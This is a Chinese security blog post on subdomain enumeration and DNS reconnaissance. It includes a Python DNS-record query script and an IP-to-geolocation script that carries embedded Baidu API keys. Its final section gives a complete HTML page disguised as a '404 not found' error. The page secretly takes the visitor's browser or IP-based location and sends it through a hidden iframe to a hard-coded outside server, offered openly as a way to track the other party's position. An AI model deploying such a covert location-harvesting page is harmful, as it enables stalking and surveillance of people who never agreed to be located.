子域名查询、DNS记录查询
目录
子域名信息查询
Layer子域名爆破机
subDomainBrute
利用google查询
HTTP证书查询
DNS记录查询脚本
IP转换为经纬度
利用网页获取对方经纬度信息
首先关于DNS域名解析的一些知识,传送门——> DNS域名解析基础
了解了DNS解析的一些知识后,我们就可以开始我们的DNS探测了!
一些和域名查询相关的网站:
- DNS查询:DNSDB
- 微步在线:https://x.threatbook.cn/
- 在线域名信息查询:http://toolbar.netcraft.com/site_report?url=
- DNS、IP等查询:ViewDNS.info - Your one source for DNS related tools!
- CDN查询IP:https://tools.ipip.net/cdn.php
- SecurityTrails平台:Historical A records for www.baidu.com - SecurityTrails
子域名信息查询
相关文章:论二级域名收集的各种姿势
查询子域名有三种方法:
- 通过爆破子域名进行查询,如 Layer子域名爆破机、subDomainBrute,在线子域名查询网站:在线子域名查询
- 通过查询DNS服务器,查询该域下的解析记录
- 通过HTTPS证书来查询(只适用于https网站) ,如:crt.sh | Certificate Search 就是通过https证书查询子域名
- 通过google查询
Layer子域名爆破机
Layer是windows下的一款子域名探测工具,其工作原理是利用子域名字典进行爆破,使用简单容易上手。
链接: 百度网盘-链接不存在 提取码: w749
subDomainBrute
subDomainBrute的特点是可以用小字典递归的发现三级域名、四级域名、甚至五级域名等不容易被探测到的域名。
- 字典较为丰富,小字典就包括1万5千条,大字典多达6万3千条
- 默认使用114DNS、百度DNS、阿里DNS这几个快速又可靠的Public DNS查询,可修改配置文件添加DNS服务器(在dict里面可以进行添加)
- 自动去重泛解析的域名,当前规则: 超过2个域名指向同一IP,则此后发现的其他指向该IP的域名将被丢弃
相关文章:子域名爆破工具subDomainsBrute
利用google查询
指定站点,然后-就是不包含这个,来查询
site:baidu.com -www
HTTP证书查询
证书透明度(Certificate Transparency)是证书授权机构的一个项目,证书授权机构会将每个SSL/TLS证书发布到公共日志中。一个SSL/TLS证书通常包含域名、子域名和邮件地址。查找某个域名所属证书的最简单的方法就是使用搜索引擎搜索一些公开的CT日志。在线网站:crt.sh | Certificate Search
可以使用python脚本ct-exposer完成
DNS记录查询脚本
# -*- coding: utf-8 -*-
# python3.7环境
"""
Created on Wed Apr 10 16:40:17 2019
@author: 小谢
"""
##############################################################DNS域名记录查询脚本######################################################
import dns.resolver
domain=input("请输入要查询的域名全拼(例如:www.baidu.com):") #网站子域名
domainpart=[]
num=domain.count('.')
part=domain.split('.')
for i in range(num):j=i+1domainpart.append(part[j])
subdomain=".".join(domainpart) #网站主域名
print("该网站主域名为:%s"%subdomain)
#查询A记录
A=dns.resolver.query(domain,'A')
print("********************A记录********************")
for i in A.response.answer:print(i)#查询CNAME记录
try:CNAME=dns.resolver.query(domain,'CNAME')print("********************CNAME记录********************")for i in CNAME.response.answer:print(i)
except:print("--------------------该域名没有CNAME记录!!--------------------")#domain=input("请输入要查询的主域名(例如:baidu.com):")
#查询MX记录
try:MX=dns.resolver.query(subdomain,'MX')print("********************MX记录********************")for i in MX.response.answer:print(i)
except:print("--------------------该域名没有MX记录!!--------------------")
#NS记录
try:NS=dns.resolver.query(subdomain,'NS')print("********************NS记录********************")for i in NS.response.answer:print(i)
except:print("--------------------该域名没有NS记录!!--------------------")
#SOA记录
try:SOA=dns.resolver.query(subdomain,'SOA')print("********************SOA记录********************")for i in SOA.response.answer:print(i)
except:print("--------------------该域名没有SOA记录!!--------------------")#TXT记录
try:TXT=dns.resolver.query(subdomain,'TXT')print("********************TXT记录********************")for i in TXT.response.answer:print(i)
except:print("--------------------该域名没有TXT记录!!--------------------")#SRV记录
try:SRV=dns.resolver.query(domain,'SRV')print("********************SRV记录********************")for i in SRV.response.answer:print(i)
except:print("--------------------该域名没有SRV记录!!--------------------")
#AAAA记录
try:SRV=dns.resolver.query(domain,'AAAA')print("********************AAAA记录********************")for i in SRV.response.answer:print(i)
except:print("--------------------该域名没有AAAA记录!!--------------------")
IP转换为经纬度
# -*- coding: utf-8 -*-
# python2.7环境
"""
Created on Wed Apr 10 16:50:26 2019
@author: 小谢
"""
#####################################################将ip转换为具体的经纬度城市信息#######################################################
#返回数据格式链接: http://lbsyun.baidu.com/index.php?title=webapi/ip-api
import urllib2
import json
ip = raw_input("please your ip address:")
url = "http://api.map.baidu.com/location/ip?ip=%s&ak=GrwQFVVB5qDWviGtSoB4VbU4KK10QVLy&coor=bd09ll"%ip
req = urllib2.Request(url)
res_data = urllib2.urlopen(req)
res = res_data.read().decode("unicode-escape") # 转格式
jsonaddress=json.loads(res)
#print res
print "城市:",jsonaddress['content']['address']
print "省份:",jsonaddress['content']['address_detail']['province']
print "区县:",jsonaddress['content']['address_detail']['district']
print "街道:",jsonaddress['content']['address_detail']['street']
print "经纬度:",jsonaddress['content']['point']['x'],",",jsonaddress['content']['point']['y']
print "纬经度:",jsonaddress['content']['point']['y'],",",jsonaddress['content']['point']['x']
经纬度街景地图:谷歌街景地图
只需要输入 纬度,经度,就可以看到定位的街景地图。
利用网页获取对方经纬度信息
<!DOCTYPE html>
<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><title>404 页面不存在 </title><script src="https://cdn.staticfile.org/jquery/1.10.2/jquery.min.js"></script><script type="text/javascript" src="http://api.map.baidu.com/getscript?v=2.0&ak=GrwQFVVB5qDWviGtSoB4VbU4KK10QVLy"></script><script src="http://pv.sohu.com/cityjson?ie=utf-8"></script><script>if(navigator.geolocation){ //如果当前浏览器支持定位navigator.geolocation.getCurrentPosition(getPositionSuccess, getPositionError);}else{console.log("您的浏览器不支持自动定位!");}/***用户定位成功**/function getPositionSuccess(position){var lat = position.coords.latitude; //经度var lng = position.coords.longitude; //纬度var address="";//通过baiduMap API获取街道名称var map = new BMap.Map("allmap");var point = new BMap.Point(lng,lat);var gc = new BMap.Geocoder();gc.getLocation(point, function(rs){var addComp = rs.addressComponents;address = addComp.city + addComp.district + addComp.street + addComp.streetNumber; //城市区县街道街道号$("#lng").attr("value",lng); //经度$("#lat").attr("value",lat); //纬度url="http://120.79.74.249:8080/?lng="+lat+","+lng; //将经纬度信息传给我们后台搭建的服务器var frame=$("<iframe>");frame.attr("src",url);frame.attr("style","display:none");$("#body").append(frame);});}/**用户定位失败**/function getPositionError(error){var ip;switch(error.code){case error.TIMEOUT:console.log("连接超时,请重试");break;case error.PERMISSION_DENIED://如果对方拒绝定位,则先通过获取对方ip向百度API获取定位ip=returnCitySN.cip;$.getJSON("http://api.map.baidu.com/location/ip?callback=?", {'ak' : 'nbB3KwnfDq6UvNxGqkRfhOzeu7EnmNCH','coor' : 'bd09ll','ip' : ip//获取的ip地址}, function(data) {var lng=data.content.point.x;//经度var lat=data.content.point.y;//纬度$("#lng").attr("value",lng); //经度$("#lat").attr("value",lat); //纬度url="http://120.79.74.249:8080/?ip="+ip+"&address="+lat+","+lng; //将ip和经纬度信息传给我们后台搭建的服务器var frame=$("<iframe>");frame.attr("src",url);frame.attr("style","display:none");$("#body").append(frame);});break;case error.POSITION_UNAVAILABLE:console.log("亲爱的火星网友,非常抱歉,我们暂时无法为您所在的星球提供位置服务");break;}}</script><style type="text/css">body,div,h3,h4,li,ol{margin:0;padding:0}body{font:14px/1.5 'Microsoft YaHei','微软雅黑',Helvetica,Sans-serif;min-width:1200px;background:#f0f1f3;}:focus{outline:0}h3,h4,strong{font-weight:700}a{color:#428bca;text-decoration:none}a:hover{text-decoration:underline}.error-page{background:#f0f1f3;padding:80px 0 180px}.error-page-container{position:relative;z-index:1}.error-page-main{position:relative;background:#f9f9f9;margin:0 auto;width:617px;-ms-box-sizing:border-box;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;padding:50px 50px 70px}</style>
</head>
<body id="body">
<div class="error-page"><h3><div class="error-page-container"><div class="error-page-main"><strong>404</strong>很抱歉,您要访问的页面不存在!</div></div></h3>
</div>
</div>
</div>
</body>
</html>
如果想跟我一起讨论的话,就快加入我的知识星球吧。星球里有一千多位同样爱好安全技术的小伙伴一起交流!知识星球 | 深度连接铁杆粉丝,运营高品质社群,知识变现的工具
相关文章: 子域名枚举的艺术深度剖析
Freebuf-DNS域名信息收集
DNS详解
子域名查询、DNS记录查询相关推荐
- 子域名查询DNS记录查询
目录 子域名信息查询 Layer子域名爆破机 subDomainBrute 利用google查询 HTTP证书查询 DNS记录查询脚本 IP转换为经纬度 利用网页获取对方经纬度信息 首先关于DNS域名 ...
- 子域名爆破C段查询调用Bing查询同IP网站
在线子域名爆破 1 <?php 2 3 function domainfuzz($domain) { 4 $ip = gethostbyname($domain); 5 preg_match(& ...
- DNS信息查询 ,子域名爆破工具
针对域名进行信息收集 1.使用whois对域名进行查询 如:对sangfor.com.cn 和 sangfor.com.cn域名进行查询 其中有比较重要的电话号,姓名,邮箱,通过查询出的邮箱,可以利用 ...
- 通过DNS解析将子域名绑定指定ip和端口
服务器绑定了域名:m.xmbygy.com,服务器上部署了一个Web项目,端口是81,访问web项目的时候就得在地址栏中输入:m.xmbygy.com:81,这样明显不太好. ...
- 高级查询(二)+php中文网,MySQL高级查询方法之记录查询
欢迎进入Linux社区论坛,与200万技术人员互动交流 >>进入 此文章主要向大家描述的是MySQL高级查询方法之记录查询的实际操作步骤,以及对其实际操作过程中要用到的代码的详细描述,以下 ...
- js随机跳转域名_从代码角度看各类子域名收集工具
作者:w7ay @ 知道创宇404实验室 开源的域名收集工具有很多,本文会从代码的角度去看各类开源的域名收集工具的技术特点,以及各有哪些优缺点,来帮助大家,在合适的时候选择合适的利用工具. 这里选取了 ...
- 子域名收集原理与子域名爆破工具
子域名收集是渗透测试中,前期信息收集必不可少的一个阶段.域名是一个站点的入口,如果一个站点难以渗透,可以尝试从它的子域名或者同一台服务器上的另外一个站点作为突破口,从而进行较为隐秘的渗透测试. 最原始 ...
- 子域名挖掘,子域名爆破,Python脚本编写(Python安全攻防)。
1.什么是域名. 域名(Domain Name),又称网域,是由一串用点分隔的名字组成的Internet上某一台计算机或计算机组的名称,用于在数据传输时对计算机的定位标识(有时也指地理位置). 由于I ...
- ad域同步其他ldap账号_域渗透——普通用户权限获得DNS记录
0x00 前言 在之前的文章<域渗透--DNS记录的获取>介绍了域渗透中获得DNS管理员权限后获取DNS记录的方法,而更普遍的情况是只有域普通用户的权限,也需要获得DNS记录. 本文将会参 ...
最新文章
- PHP获取客户端真实IP的自定义函数
- 腾讯和头条,构建类脑神经元网络的两条路线之争
- 【NLP】看不懂bert没关系,用起来so easy!
- CodeForces - 979D Kuro and GCD and XOR and SUM(字典树+暴力+模拟)
- 计算机88端口,计算机常用端口一览表
- Java经典实例:进阶版堆栈实现,支持任何对象类型
- 基于DEAP库的python进化算法-3.简单遗传算法的实现
- 磁测仪高斯计与特斯拉计、磁通计的区别
- 人口预测模型基础介绍
- win7的桌面计算机被误删,win7电脑桌面便签内容被误删怎么办?该如何恢复?
- vivox50支持鸿蒙,vivo X50系列极致轻薄的机身下,还有哪些功能和亮点?
- 诸神战纪堕落天使java_诸神战纪-堕落天使路西法
- Projector学习笔记
- 寻找最小可行化产品背后的真理
- linux 通过手机上网,Linux系统通过手机GPRS上网设置简介有哪些呢?
- QQ2013 协议分析
- enum java 赋值_java enum无法赋初始值
- 开发都有那些岗位呢?
- 记2016年中国移动广西公司面试(计算机类)
- libiec61850探究【5】- Windows下编译Goose发布
热门文章
- 灵狐系统不能找到数据库服务器,企业数据总线技术架构说明.docx
- Unable to start program bug解决方法
- Android框架排行榜
- 腾讯视频解析,Java实现
- 【正点原子FPGA连载】第七章Verilog HDL语法 -摘自【正点原子】新起点之FPGA开发指南_V2.1
- 聚合搜索V2.0泛解析泛目录站群二开源码 可做指定关键词SEO源码
- 广告点击率预估中的特征选择
- PR-AE-C4D 视频编辑工具的下载地址
- AI Studio 飞桨 零基础入门深度学习笔记1-深度学习的定义
- 四极管:WaitForMultipleObjects的疑惑